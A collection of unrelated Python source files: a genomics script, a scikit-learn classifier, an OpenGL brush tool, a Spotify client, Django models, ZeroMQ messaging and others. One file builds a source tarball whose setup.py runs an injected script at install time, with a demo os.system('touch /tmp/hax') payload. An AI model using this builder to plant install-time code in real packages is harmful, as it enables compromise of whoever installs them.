MINPERCENTTOCALL = 0.9
blklength = lambda blks: sum(end-start for start, end in blks)
class ContinuousCache(object):
def __init__(self, opener):
self.curkey = None
self.current = None
self.opener = opener
def get(self, key):
if self.curkey != key:
self.curkey = key
self.current = self.opener(key)
return self.current
def process(nrlist):
nucleotidetracks = [rseqarr.TRACKS.index(i) for i in 'ACGT']
for nracc in nrlist:
dbinfo = refFlat[nracc]
chrom = dbinfo['chrom']
genomeseq = ''.join(mm9.get(chrom, blkstart, blkend)
for blkstart, blkend in dbinfo['exonBlocks']).upper()
if dbinfo['strand'] == '-':
utr3, utr5 = 'leftUtrBlocks', 'rightUtrBlocks'
else:
utr5, utr3 = 'leftUtrBlocks', 'rightUtrBlocks'
if nracc.startswith('NM_'):
utr5length = blklength(dbinfo[utr5])
cdslength = blklength(dbinfo['cdsBlocks'])
utr3length = blklength(dbinfo[utr3])
else:
exonlength = blklength(dbinfo['exonBlocks'])
cntarray = rseqarr.get_blocks(dbinfo['chrom'], dbinfo['exonBlocks'],
dbinfo['strand'])[nucleotidetracks]
depthcnt = np.array(cntarray.sum(0).clip(1), 'd')
confidentcalls = ((cntarray/depthcnt >= MINPERCENTTOCALL) *
(depthcnt >= MINREADSTOCALL))
mutatedseq = list(genomeseq)
for base, calls in zip('ACGT', confidentcalls):
for pos in np.where(calls)[0]:
mutatedseq[pos] = base
mutatedseq = ''.join(mutatedseq)
if dbinfo['strand'] == '-':
mutatedseq = reverse_complement(mutatedseq)
if nracc.startswith('NM_'):
print >> bedout, '\t'.join([nracc, str(utr5length),
str(utr5length + cdslength),
'%s' % dbinfo['geneName'], '.', '+'])
else:
print >> bedout, '\t'.join([nracc, '0', str(exonlength),
'%s' % dbinfo['geneName'], '.', '+'])
print >> faout, '>%s %s' % (nracc, dbinfo['geneName'])
faout.write(textwrap(mutatedseq))
if __name__ == '__main__':
refflatdbpath = sys.argv[1]
nrlistpath = sys.argv[2]
genomefastapath = sys.argv[3]
rnaseqgspace = sys.argv[4]
fastaoutpath = sys.argv[5]
bedoutpath = sys.argv[6]
refFlat = shelve.open(refflatdbpath, 'r')
mm9 = GiantFASTAFile(genomefastapath)
rseqarr = MultiTrackSplitBinnedArray(rnaseqgspace)
nrlist = open(nrlistpath).read().split()
bedout = open(bedoutpath, 'w')
faout = open(fastaoutpath, 'w')
process(nrlist)
|
991,436 | 7f15a1c532d9a6f1d7aa4e255b381f2316219d31 | # -*- coding: utf-8 -*-
class Card:
SUITS = ['S', 'H', 'D', 'C']
RANKS = ['6', '7', '8', '9', '10', 'J', 'Q', 'K', 'A']
SUITS_PRINTABLE = ['♠', '♥', '♦', '♣']
def __init__(self, suit, rank):
self.suit = suit;
self.rank = rank;
def __repr__(self):
return self.rank + self.printable_suit(self.suit)
def printable_suit(self, suit):
return Card.SUITS_PRINTABLE[Card.SUITS.index(suit)]
def greaterThan(self, card):
return self.suit == card.suit and Card.RANKS.index(self.rank) > Card.RANKS.index(card.rank)
def sameRank(self, card):
return self.rank == card.rank;
|
991,437 | 184064077c31493900d49abe8e8fd49481c8e0c4 | '''
Created on Mar 27, 2019
@author: dsj529
'''
import numpy as np
import pandas as pd
from pandas.plotting import scatter_matrix
from matplotlib import pyplot as plt
from sklearn import model_selection, preprocessing
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.metrics import classification_report
from sklearn.metrics import accuracy_score
## Load Dataset
url = "https://archive.ics.uci.edu/ml/machine-learning-databases/breast-cancer-wisconsin/breast-cancer-wisconsin.data"
names = ['id', 'clump_thickness', 'uniform_cell_size', 'uniform_cell_shape',
'marginal_adhesion', 'single_epithelial_size', 'bare_nuclei',
'bland_chromatin', 'normal_nucleoli', 'mitoses', 'class']
df = pd.read_csv(url, names=names)
## Preprocess the data
df.replace('?',-99999, inplace=True)
print(df.axes)
df.drop(['id'], 1, inplace=True)
#===================================================================================================
# ## inspect the dataset
# print(df.loc[10])
# print(df.shape)
# print(df.describe())
# df.hist(figsize=(10,10))
# plt.show()
# scatter_matrix(df, figsize=(18,18))
# plt.show()
#===================================================================================================
## prepare data for learning
X = np.array(df.drop(['class'], 1))
y = np.array(df['class'])
X_train, X_test, y_train, y_test = model_selection.train_test_split(X, y, test_size=0.2)
## set up the classifiers
scoring = 'accuracy'
models = []
models.append(('KNN', KNeighborsClassifier(n_neighbors=5)))
models.append(('SVM', SVC(gamma='scale')))
results=[]
names=[]
for name, model in models:
kfold=model_selection.KFold(n_splits=10)
cv_results = model_selection.cross_val_score(model, X_train, y_train, cv=kfold, scoring=scoring)
results.append(cv_results)
names.append(name)
msg = '{}: {:f} ({:f})'.format(name, cv_results.mean(), cv_results.std())
print(msg)
## predict on test/validation set
for name, model in models:
model.fit(X_train, y_train)
preds = model.predict(X_test)
print(name)
print(accuracy_score(y_test, preds))
print(classification_report(y_test, preds)) |
991,438 | b2822f2b6386413e7fc2bc143befa5f1de55d9d8 | import random
def guess():
number = random.randint(1, 20)
attempt = 0
while (attempt != number):
print('Take a guess')
attempt = int(input())
if (attempt < number):
print('Too low.')
elif (attempt > number):
print('Too high.')
else:
break
print('Good job.')
print('I am thinking of a number between 1 and 20.')
guess()
|
991,439 | 2a82b2c70ea7f3e3472c0a03069dad0222774c06 | import os
to_split_fn = '/afs/csail.mit.edu/u/t/tzhan/eeg/patient_file_lists/largest/patient_largest_files_whole.txt'
output_fn = '/afs/csail.mit.edu/u/t/tzhan/eeg/patient_file_lists/largest/hosp_largest_files.txt'
# Number of files to split each hospital into
split_n = 2
def chunkIt(seq, num):
# split list into 'n' equal parts
avg = len(seq) / float(num)
out = []
last = 0.0
while last < len(seq):
out.append(seq[int(last):int(last + avg)])
last += avg
return out
def write_splits(hospital_files, hospital_name):
splits = chunkIt(hospital_files, split_n)
for i, split in enumerate(splits):
filepath = output_fn.replace('hosp', '{}{}'.format(hospital_name, i))
with open(filepath, 'w') as f:
for line in split:
f.write(line)
with open(to_split_fn) as f:
lines = f.readlines()
mgh = []
bi = []
yale = []
bwh = []
for line in lines:
if 'CA_MGH' in line:
mgh.append(line)
elif 'CA_BIDMC' in line:
bi.append(line)
elif 'ynh' in line:
yale.append(line)
elif 'bwh' in line:
bwh.append(line)
else:
print 'not a proper edf', line
write_splits(mgh, 'mgh')
write_splits(bi, 'bi')
write_splits(yale, 'yale')
write_splits(bwh, 'bwh')
|
991,440 | 5f381e7fde408830df2c4f73bf3137d4c5ad6e79 | import uhal
uhal.disableLogging()
hw_man = uhal.ConnectionManager("file://connection.xml")
amc13 = hw_man.getDevice("amc13")
# reset AMC13 (necessary for daq link to be ready after reset of WFD)
amc13.getNode("CONTROL0").write(0x1)
amc13.dispatch()
|
991,441 | 94e10aab9145a2b9e206e211a7c812d0a9303002 | #! /usr/bin/env python
from __future__ import print_function
from PyQt4 import QtCore,QtGui
from PyQt4.QtOpenGL import *
from OpenGL.GL import *
from OpenGL.GLU import *
import time
import numpy
import math
import os, sys
import Texture
def distance(x1,y1,x2,y2):
dx = x1 - x2
dy = y1 - y2
return math.sqrt(dx*dx + dy*dy)
class BlendGL(QGLWidget):
def __init__(self, parent):
QGLWidget.__init__(self, parent)
self.setMouseTracking(True)
self.isPressed = False
self.oldx = self.oldy = 0
self.nearest = -1
self.startTime = float(time.time())
self.warpWidth = 512
self.warpHeight = 512
self.border = 0.0
self.texID = 0
self.brushSize = 30.0
self.brushSoftness = 1.0
self.brushMode = False
self.brushImage = None
self.updateBrushImage()
self.leftOverDistance = 0
def updateBrushImage(self):
size = int(math.ceil(self.brushSize))
self.brushImage = numpy.zeros(size*size,numpy.uint8)
r = self.brushSize * 0.5
innerRadius = self.brushSoftness * ( - r) + r
for x in range(0,size):
for y in range(0,size):
d = distance(x,y,r,r)
v = (d - innerRadius) / (r - innerRadius)
if v < 0.0: v = 0.0
if v > 1.0: v = 1.0
self.brushImage[y*size+x] = v * 255
def paintGL(self):
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glDisable( GL_DEPTH_TEST )
glDisable( GL_CULL_FACE )
if self.texID == 0: return
glLoadIdentity()
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
left, right, top, bottom = self.viewRect()
gluOrtho2D(left,right,top,bottom)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
glBegin(GL_QUADS)
glColor4f(1.0,1.0,1.0,1.0)
glTexCoord2f(0.0, 0.0); glVertex2f(-0.5,-0.5)
glTexCoord2f(1.0, 0.0); glVertex2f(0.5,-0.5)
glTexCoord2f(1.0, 1.0); glVertex2f(0.5,0.5)
glTexCoord2f(0.0, 1.0); glVertex2f(-0.5,0.5)
glEnd()
glEnable(GL_TEXTURE_2D)
glBindTexture(GL_TEXTURE_2D, self.texID)
glColor4f(0.0,0.0,0.0,1.0)
glBlendFunc (GL_SRC_ALPHA,GL_ONE_MINUS_SRC_ALPHA)
glTexEnvf(GL_TEXTURE_ENV, GL_TEXTURE_ENV_MODE, GL_MODULATE)
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S,GL_CLAMP_TO_EDGE);
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T,GL_CLAMP_TO_EDGE);
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)
self.updateTex()
glBegin(GL_QUADS)
#glColor4f(1.0,1.0,1.0,1.0)
glTexCoord2f(0.0, 0.0); glVertex2f(-0.5,-0.5)
glTexCoord2f(1.0, 0.0); glVertex2f(0.5,-0.5)
glTexCoord2f(1.0, 1.0); glVertex2f(0.5,0.5)
glTexCoord2f(0.0, 1.0); glVertex2f(-0.5,0.5)
glEnd()
glBindTexture(GL_TEXTURE_2D, 0)
glColor4f(1.0,1.0,1.0,1.0)
posx,posy = self.screenPos()
glEnable(GL_BLEND);
glBlendFunc(GL_ONE_MINUS_DST_COLOR, GL_ZERO);
glBegin(GL_LINE_LOOP)
n = 16
r = self.brushSize*0.5 / self.warpWidth
for i in range(0,n):
glVertex2f(posx+
r*math.cos(i/float(n)*math.pi*2),posy+
r*math.sin(i/float(n)*math.pi*2) * (self.warpWidth/float(self.warpHeight)) )
glEnd()
self.update()
#glFlush()
def resizeGL(self, widthInPixels, heightInPixels):
glViewport(0, 0, widthInPixels, heightInPixels)
def viewRect(self):
warpAspect = float(self.warpWidth) / self.warpHeight
viewAspect = float(self.width()) / self.height()
b = self.border * 0.5
left, right, top, bottom = -0.5 - b,0.5 + b,-0.5 - b,0.5 + b
if warpAspect > viewAspect:
top *= warpAspect / viewAspect
bottom *= warpAspect / viewAspect
else:
left *= viewAspect / warpAspect
right *= viewAspect / warpAspect
return left, right, top, bottom
def initializeGL(self):
glClearColor(0.0, 0.0, 0.0, 1.0)
glClearDepth(1.0)
glEnable(GL_TEXTURE_2D)
glEnable(GL_BLEND)
self.texID = glGenTextures(1)
self.texData = numpy.zeros((self.warpWidth*self.warpHeight),numpy.uint8)
glBindTexture(GL_TEXTURE_2D, self.texID)
glPixelStorei(GL_UNPACK_ALIGNMENT,1)
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP)
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP)
self.updateTex()
glBindTexture(GL_TEXTURE_2D,0)
def updateTex(self):
glTexImage2D(
GL_TEXTURE_2D, 0, GL_ALPHA, self.warpWidth, self.warpHeight, 0,
GL_ALPHA, GL_UNSIGNED_BYTE, self.texData)
def mouseMoveEvent(self, e):
if self.isPressed:
self.leftOverDistance = self.drawLine(self.oldx,self.oldy,e.x(),e.y(),self.leftOverDistance)
self.oldx = e.x()
self.oldy = e.y()
self.update()
def keyPressEvent(self,e):
self.update()
if e.key() == QtCore.Qt.Key_Left:
self.brushSoftness -= 0.01
elif e.key() == QtCore.Qt.Key_Right:
self.brushSoftness += 0.01
elif e.key() == QtCore.Qt.Key_Up:
self.brushSize += 1
elif e.key() == QtCore.Qt.Key_Down:
self.brushSize -= 1
elif e.key() == QtCore.Qt.Key_Space:
self.brushMode = not self.brushMode
self.updateBrushImage()
print(self.brushSize,self.brushSoftness)
def mousePressEvent(self, e):
self.isPressed = True
p1x,p1y = self.pixelPos(e.x(),e.y())
self.leftOverDistance = 0.0
self.manipulatePixel(p1x,p1y)
self.oldx = e.x()
self.oldy = e.y()
self.update()
#int innerRadius = (int)ceil(mSoftness * (0.5 - mRadius) + mRadius);
#int outerRadius = (int)ceil(mRadius);
#float alphaStep = 1.0 / (outerRadius - innerRadius + 1);
def drawLine(self,p1x,p1y,p2x,p2y,leftOverDistance):
p1x,p1y = self.pixelPos(p1x,p1y)
p2x,p2y = self.pixelPos(p2x,p2y)
# Anything less that half a pixel is overkill and could hurt performance.
spacing = self.brushSize / 10.0
if spacing < 0.5 : spacing = 0.5
deltaX = p2x - p1x;
deltaY = p2y - p1y;
dist = distance(p1x,p1y,p2x,p2y)
stepX = 0.0
stepY = 0.0
if dist > 0.0 :
invertDistance = 1.0 / dist
stepX = deltaX * invertDistance
stepY = deltaY * invertDistance
offsetX = 0.0
offsetY = 0.0
totalDistance = leftOverDistance + dist
# While we still have distance to cover, stamp
while totalDistance >= spacing :
if leftOverDistance > 0:
offsetX += stepX * (spacing - leftOverDistance)
offsetY += stepY * (spacing - leftOverDistance)
leftOverDistance -= spacing
else:
offsetX += stepX * spacing
offsetY += stepY * spacing
self.manipulatePixel(p1x + offsetX,p1y + offsetY)
totalDistance -= spacing
return totalDistance
def manipulatePixel(self,x,y):
r = self.brushSize*0.5
size = int(math.ceil(self.brushSize))
for i in range(0,size):
for j in range(0,size):
posx = int(i + x - r)
posy = int(j + y - r)
if (posx < 0) or (posx >= self.warpWidth): continue
if (posy < 0) or (posy >= self.warpHeight): continue
idx = posy*self.warpWidth+posx
v = self.brushImage[j*size + i]/255.0
if self.brushMode:
pix= self.texData[idx] * v
else:
pix= 255.0 - 255.0*v + self.texData[idx] * v
self.texData[idx] = pix
def mouseReleaseEvent(self, e):
self.isPressed = False
self.leftOverDistance = 0.0
self.update()
def toScreenPos(self,x,y):
left, right, top, bottom = self.viewRect()
width = right - left
height = bottom - top
return ((float(x) / self.width() - 0.5) * width,(1.0 - float(y) / self.height() - 0.5) * height)
def screenPos(self):
return self.toScreenPos(self.oldx,self.oldy)
def pixelPos(self,px,py):
x,y = self.toScreenPos(px,py)
return (int(float(x+0.5)*self.warpWidth),int(float(y+0.5)*self.warpHeight))
if __name__ == '__main__':
app = QtGui.QApplication(['WarpTest'])
window = BlendGL(None)
window.show()
sys.exit(app.exec_())
|
991,442 | 4c15792d1105b57e5e11042bc7949ad77b8bff32 | import io
import tarfile
import textwrap
import sys
SCRIPT_TEMPLATE= """#!/usr/bin/env python
from distutils.core import setup
setup(name='{name}',
version='1.0',
)
try:
{script}
except Exception as e:
print(e)
"""
DEFAULT_SCRIPT = """print(42)"""
def build_setup(script, name):
script_body = textwrap.indent(script, ' ')
return SCRIPT_TEMPLATE.format(name=name, script=script_body)
def wrap_in_tarball(filename, contents):
output = io.BytesIO()
tar = tarfile.open(mode='w:gz', fileobj=output)
contents = contents.encode('utf-8')
fileinfo = tarfile.TarInfo(name=filename)
fileinfo.size = len(contents)
contents_file_obj = io.BytesIO(contents)
tar.addfile(fileinfo, fileobj=contents_file_obj)
tar.close()
return output.getvalue()
def build_pkg(script=DEFAULT_SCRIPT, name="foo"):
setup_py_contents = build_setup(script, name)
full_filename = "{}-1.0/setup.py".format(name)
tar = wrap_in_tarball(full_filename, setup_py_contents)
return tar
if __name__ == "__main__":
script="""
import os
os.system("touch /tmp/hax")
"""
tar = build_pkg(script)
sys.stdout.buffer.write(tar)
|
991,443 | 485609f6d3dc345b05149c00ee62e2c6e41b7fd0 | n = int(input())
initial = 5
total = 0
for i in range(n):
liked = initial//2
total+=liked
initial = liked*3
print(initial,liked,total)
|
991,444 | 5a02ed9788a12d065aca99c098dec2579f7e0c6f | import json
import requests
from song import Song
class SpotifyRecom:
def __init__(self, token):
self.token = token
def get_last_played_tracks(self, limit=10):
url = f"https://api.spotify.com/v1/me/player/recently-played?limit={limit}"
response = self._place_get_api_request(url)
response_json = response.json()
tracks = [Song(track["track"]["name"], track["track"]["id"], track["track"]["artists"][0]["name"])
for track in response_json["items"]]
return tracks
def get_track_recommendations(self, seed_tracks, limit=10):
seed_tracks_url = ""
for seed_track in seed_tracks:
seed_tracks_url += seed_track.id + ","
seed_tracks_url = seed_tracks_url[:-1]
url = f"https://api.spotify.com/v1/recommendations?seed_tracks={seed_tracks_url}&limit={limit}"
response = self._place_get_api_request(url)
response_json = response.json()
tracks = [Song(track["name"], track["id"], track["artists"][0]["name"])
for track in response_json["tracks"]]
return tracks
def _place_get_api_request(self, url):
response = requests.get(
url,
headers={
"Content-Type": "application/json",
"Authorization": f"Bearer {self.token}"
}
)
return response
def _place_post_api_request(self, url, data):
response = requests.post(
url,
data=data,
headers={
"Content-Type": "application/json",
"Authorization": f"Bearer {self.token}"
}
)
return response |
991,445 | 33bcab25b344966d173bbce74e37cbd3bb29b72e | from __future__ import unicode_literals
from django.utils.encoding import python_2_unicode_compatible
from django.db import models
from django.contrib.postgres.fields import ArrayField
import os
@python_2_unicode_compatible
class Classes(models.Model):
letter_yr = models.CharField(max_length=2, primary_key=True)
def __str__(self):
return self.letter_yr
@python_2_unicode_compatible
class Courses(models.Model):
code = models.CharField(max_length=200, primary_key=True)
title = models.CharField(max_length=200)
lecturer = models.ForeignKey('People', on_delete=models.PROTECT)
def __str__(self):
return self.code + " " + self.title
@python_2_unicode_compatible
class People(models.Model):
login = models.CharField(max_length=200, primary_key=True)
firstname = models.CharField(max_length=200)
lastname = models.CharField(max_length=200)
student_letter_yr = models.ForeignKey(Classes, on_delete=models.PROTECT, null=True)
tutor = models.ForeignKey('self', on_delete=models.PROTECT, null=True)
required_courses = models.ManyToManyField(Courses, related_name='required')
registered_courses = models.ManyToManyField(Courses, related_name='registered')
def __str__(self):
return self.login
@python_2_unicode_compatible
class Term(models.Model):
term = models.IntegerField(primary_key=True)
name = models.CharField(max_length=200)
def __str__(self):
return self.term.__str__() + ": " + self.name
@python_2_unicode_compatible
class Courses_Term(models.Model):
code = models.ForeignKey(Courses, on_delete=models.PROTECT)
term = models.ForeignKey(Term, on_delete=models.PROTECT)
def __str__(self):
return self.code.__str__() + " " + self.term.__str__()
@python_2_unicode_compatible
class Courses_Classes(models.Model):
code = models.ForeignKey(Courses, on_delete=models.PROTECT)
letter_yr = models.ForeignKey(Classes, on_delete=models.PROTECT)
def __str__(self):
return self.code.__str__() + " " + self.letter_yr.__str__()
@python_2_unicode_compatible
class Exercises(models.Model):
code = models.ForeignKey(Courses, on_delete=models.PROTECT)
number = models.IntegerField()
title = models.CharField(max_length=200)
start_date = models.DateTimeField()
deadline = models.DateTimeField()
COURSEWORK = 'CW'
PROJECT = 'PROJ'
REPORT = 'REP'
TEST = 'T'
EXAM = 'WES'
TUTORIAL = 'TUT'
TYPE_CHOICES = (
(COURSEWORK, 'Coursework'),
(PROJECT, 'Project'),
(REPORT, 'Report'),
(TEST, 'Test'),
(EXAM, 'Exam'),
(TUTORIAL, 'Tutorial'),
)
NO = 'NO'
INDIVIDUAL = 'INDIVIDUAL'
GROUP = 'GROUP'
ASSESSMENT_CHOICES = (
(NO, 'No Assessment'),
(INDIVIDUAL, 'Individual'),
(GROUP, 'Group'),
)
HARDCOPY = 'HARDCOPY'
ELECTRONIC = 'ELECTRONIC'
SUBMISSION_CHOICES = (
(NO, 'No submission'),
(HARDCOPY, 'Hardcopy'),
(ELECTRONIC, 'Electronic'),
)
exercise_type = models.CharField(
max_length=15,
choices=TYPE_CHOICES,
)
assessment = models.CharField(
max_length=15,
choices=ASSESSMENT_CHOICES,
default=NO,
)
submission = models.CharField(
max_length=15,
choices=SUBMISSION_CHOICES,
default=NO,
)
esubmission_files_names = ArrayField(models.CharField(max_length=50), default=[])
mark_release_date = models.DateTimeField(null=True)
class Meta:
unique_together = (('code', 'number'),)
def __str__(self):
return self.code.code + " " + self.number.__str__() + " " + self.title + ": " + self.start_date.__str__() + " ~ " + self.deadline.__str__()
@python_2_unicode_compatible
class Period(models.Model):
period = models.IntegerField(primary_key=True)
name = models.CharField(max_length=200)
start_date = models.DateField()
end_date = models.DateField()
def __str__(self):
return self.period.__str__() + " " + self.period.name + ": " + self.start_date.__str__() + " ~ " + self.end_date.__str__()
@python_2_unicode_compatible
class Resource(models.Model):
file = models.FileField(upload_to='')
timestamp = models.DateTimeField(auto_now=True)
def filename(self):
return os.path.basename(self.file.name)
def __str__(self):
return self.file.name + " " + self.timestamp.__str__()
@python_2_unicode_compatible
class Courses_Resource(models.Model):
code = models.ForeignKey(Courses, on_delete=models.PROTECT)
title = models.CharField(max_length=200)
resource = models.ForeignKey(Resource, on_delete=models.CASCADE, null=True)
link = models.URLField(null=True)
release_date = models.DateField()
NOTE = 'NOTE'
PROBLEM = 'PROBLEM'
URL = 'URL'
PANOPTO = 'PANOPTO'
PIAZZA = 'PIAZZA'
HOMEPAGE = 'HOMEPAGE'
TYPE_CHOICES = (
(NOTE, 'Note'),
(PROBLEM, 'Problem'),
(URL, 'Url'),
(PANOPTO, 'Panopto'),
(PIAZZA, 'Piazza'),
(HOMEPAGE, 'Homepage'),
)
course_resource_type = models.CharField(
max_length=15,
choices=TYPE_CHOICES,
default=NOTE,
)
def __str__(self):
return self.code.__str__() + " " + self.resource.__str__()
@python_2_unicode_compatible
class Exercises_Resource(models.Model):
exercise = models.ForeignKey(Exercises, on_delete=models.PROTECT)
resource = models.ForeignKey(Resource, on_delete=models.CASCADE)
SPECIFICATION = 'SPEC'
DATA = 'DATA'
ANSWER = 'ANSWER'
MARKING = 'MARKING'
TYPE_CHOICES = (
(SPECIFICATION, 'Specification'),
(DATA, 'Data file'),
(ANSWER, 'Model answer'),
(MARKING, 'Marking scheme'),
)
exercise_resource_type = models.CharField(
max_length=15,
choices=TYPE_CHOICES,
default=SPECIFICATION,
)
def __str__(self):
return self.exercise.__str__() + " " + self.resource.__str__()
@python_2_unicode_compatible
class Submissions(models.Model):
exercise = models.ForeignKey(Exercises, on_delete=models.PROTECT)
leader = models.ForeignKey(People, on_delete=models.PROTECT, related_name='leader')
members = models.ManyToManyField(People, related_name='members')
files = models.ManyToManyField(Resource)
timestamp = models.DateTimeField(auto_now=True)
def __str__(self):
return self.exercise.code.code + " " + self.exercise.number.__str__() + " " + self.leader.__str__() + self.members.all().__str__()
@python_2_unicode_compatible
class Marks(models.Model):
exercise = models.ForeignKey(Exercises, on_delete=models.PROTECT)
login = models.ForeignKey(People, on_delete=models.PROTECT)
mark = models.DecimalField(max_digits=5, decimal_places=2)
def __str__(self):
return self.login.__str__() + " " + self.exercise.code.code + " " + self.exercise.number.__str__() + " " + self.mark.__str__()
|
991,446 | 4db9f5dd32f67d70e42e20a62bf70db08ccb2fa6 | '''
Created on Aug 25, 2014
@author: Changlong
'''
import zmq
import threading
import struct
import logging
import datetime
import time
import traceback
from twisted.internet import threads
from twisted.internet.defer import DeferredLock
from DB import SBDB, SBDB_ORM
# from SBPS import ProtocolReactor
from Utils import Util, Config
import Command
from Command import RedirectNotify
PORT_PUBSUB = 5557
TTYPE_GATEWAY = b'g'
TTYPE_HUMAN = b'h'
TTYPE_SERVER = b's'
TTYPE_ONLINEOFFLINE = b'o'
TTYPE_MANAGEMENT = b'm'
OPER_ONLINE = b'on'
OPER_OFFLINE = b'off'
OPER_REQUEST = b'req'
OPER_RESPONSE = b'res'
OPER_REDIRECT = b'direct'
OPER_LOAD = b'load'
OPER_SIMPLECONTROL = b'sc'
OPER_SIMPLECONTROLRESP = b'scr'
context = None
socketSubscribe = None
socketPublish = None
listSubscribedServer = []
lockPublish = DeferredLock()
protocolInternal = None
# online status,map of relayer_id-->CConnectionIterm
dictRelayerServer = {}
# online status,map of client_id-->CConnectionIterm
dictClientServer = {}
# server connection count, map of server_id-->connection count
dictServerLoad = {}
# server information, map of server_id-->ip address
dictServerInfo = {}
MyServerID = 0
MyServerAddress = Config.domain_name
MyServerType = SBDB.CV_TYPE_SERVER_FUNCTION
lockMaps = threading.RLock()
Max_Server_Load = 5000
def str_to_bytes(o):
if isinstance(o, str):
return o.encode('utf-8')
else:
return o
def bytes_to_str(o):
if isinstance(o, bytes):
return o.decode('utf-8')
else:
return o
def AddSubscribeServer(listServer, serverType=SBDB.CV_TYPE_SERVER_FUNCTION):
global MyServerID, MyServerAddress, MyServerType, dictServerInfo
listMyIPs = Util.GetMachineIPs()
for server in listServer:
if server[1] not in listSubscribedServer:
socketSubscribe.connect("tcp://%s:%d" % (server[1], PORT_PUBSUB))
listSubscribedServer.append(server[1])
dictServerInfo[server[0]] = server[2]
if server[1] in listMyIPs:
MyServerID = server[0]
MyServerAddress = server[1]
if MyServerType != SBDB.CV_TYPE_SERVER_SUPERVISION:
MyServerType = serverType
def PublishMessageCallback(lock, data):
try:
data = list(map(str_to_bytes, data))
socketPublish.send_multipart(data)
print("data sent of InternalMessage %s:%s:%s (%s%s%s)" %
(data[0], data[1], data[2], Util.asscii_string(data[0]),
Util.asscii_string(data[1]), Util.asscii_string(data[2])))
except:
print(traceback.format_exc())
finally:
lock.release()
def PublishMessage(head, fromInfo, body):
lockPublish.acquire().addCallback(PublishMessageCallback,
[head, fromInfo, body])
class CInternalMessage(object):
'''
classdocs
'''
def __init__(self, head=b"|0|0||", from_filter=b"|0|0", body=b""):
'''
Constructor
'''
[
self.destType, self.destId, self.destSock, self.operation,
self.addition
] = head.split(b'|')
self.destId = int(self.destId)
self.destSock = int(self.destSock)
[self.fromType, self.fromId, self.fromSock] = from_filter.split(b'|')
self.fromId = int(self.fromId)
self.fromSock = int(self.fromSock)
self.body = body
def SetParam(self, destType, destId, destSock, operation, addition,
fromType, fromId, fromSock):
self.destType, self.destId, self.destSock, self.operation, self.addition, self.fromType, self.fromId, self.fromSock = destType, destId, destSock, operation, addition, fromType, fromId, fromSock
def Send(self):
PublishMessage(
"%s|%d|%d|%s|%s" % (bytes_to_str(self.destType), self.destId,
self.destSock, bytes_to_str(self.operation),
bytes_to_str(self.addition)),
"%s|%d|%d" % (bytes_to_str(self.fromType), self.fromId,
self.fromSock), self.body)
class CConnectionItem(object):
def __init__(self, server_id):
'''
Constructor
'''
self.dt_active = datetime.datetime.now()
self.server_id = server_id
def NotifyTerminalStatus(terminal_type,
terminal_id,
terminal_sock,
operation,
balance="y"):
global MyServerID
message = CInternalMessage()
message.SetParam(TTYPE_ONLINEOFFLINE + terminal_type, terminal_id,
terminal_sock, operation, balance, TTYPE_SERVER,
MyServerID, 0)
message.Send()
def RedirectHumanTo(client_id, server_id):
message = CInternalMessage()
message.SetParam(TTYPE_HUMAN, client_id, 0, OPER_REDIRECT,
dictServerInfo[server_id], TTYPE_SERVER, MyServerID, 0)
message.Send()
def RegistFilter(destType, destId=None):
head = ""
if isinstance(destType, bytes):
destType = destType.decode('utf-8')
if destId is None:
head = destType
else:
head = "%s|%d|" % (destType, destId)
print("RegistFilter %s......................................" % (head))
socketSubscribe.setsockopt(zmq.SUBSCRIBE, head.encode('utf-8'))
def UnregistFilter(destType, destId=None):
head = ""
if isinstance(destType, bytes):
destType = destType.decode('utf-8')
if destId is None:
head = destType
else:
head = "%s|%d|" % (destType, destId)
print("UnRegistFilter %s ***************************************" % (head))
socketSubscribe.setsockopt(zmq.UNSUBSCRIBE, head.encode('utf-8'))
def CheckMapsByActiveTime():
with lockMaps:
for relayer_id in dictRelayerServer.keys():
if dictRelayerServer[relayer_id].dt_active < datetime.datetime.now(
) - datetime.timedelta(seconds=Config.time_heartbeat):
# timeout
item = dictRelayerServer.pop(relayer_id)
dictServerLoad[
item.server_id] = dictServerLoad[item.server_id] - 1
for client_id in dictClientServer.keys():
if dictClientServer[client_id].dt_active < datetime.datetime.now(
) - datetime.timedelta(seconds=Config.time_heartbeat):
# timeout
item = dictClientServer.pop(client_id)
dictServerLoad[
item.server_id] = dictServerLoad[item.server_id] - 1
def LoadMapsFromDatabase():
dictServerLoad.clear()
dictClientServer.clear()
dictRelayerServer.clear()
with SBDB.session_scope() as session:
for client in session.query(SBDB_ORM.Client).filter(
SBDB_ORM.Client.dt_active > datetime.datetime.now() -
datetime.timedelta(seconds=Config.time_heartbeat)).all():
item = CConnectionItem(client.server_id)
item.dt_active = client.dt_active
dictClientServer[client.id] = item
dictServerLoad[item.server_id] = dictServerLoad.get(
item.server_id, 0) + 1
for relayer in session.query(SBDB_ORM.Relayer).filter(
SBDB_ORM.Relayer.dt_active > datetime.datetime.now() -
datetime.timedelta(seconds=Config.time_heartbeat)).all():
item = CConnectionItem(relayer.server_id)
item.dt_active = relayer.dt_active
dictRelayerServer[relayer.id] = item
dictServerLoad[item.server_id] = dictServerLoad.get(
item.server_id, 0) + 1
def ThreadCheckMaps():
from SBPS import ProtocolReactor
LoadMapsFromDatabase()
waitTimes = Config.time_heartbeat / 2
n = 0
while not ProtocolReactor.bReactorStopped:
if 0 == n:
CheckMapsByActiveTime()
# notify all server to load config
message = CInternalMessage()
message.SetParam(TTYPE_SERVER, 0, 0, OPER_LOAD, "", TTYPE_SERVER,
MyServerID, 0)
message.Send()
n = (n + 1) % waitTimes
time.sleep(2)
def traced_ThreadCheckMaps():
import traceback
try:
ThreadCheckMaps()
except:
print(traceback.format_exc())
def RunOnlineMessage(message):
global dictRelayerServer, dictClientServer, dictServerLoad, dictServerInfo, lockMaps
with lockMaps:
if len(message.destType) < 2:
return
if (message.destType[1] == TTYPE_HUMAN):
session_key = message.destId
if message.operation == OPER_ONLINE:
if session_key not in dictClientServer:
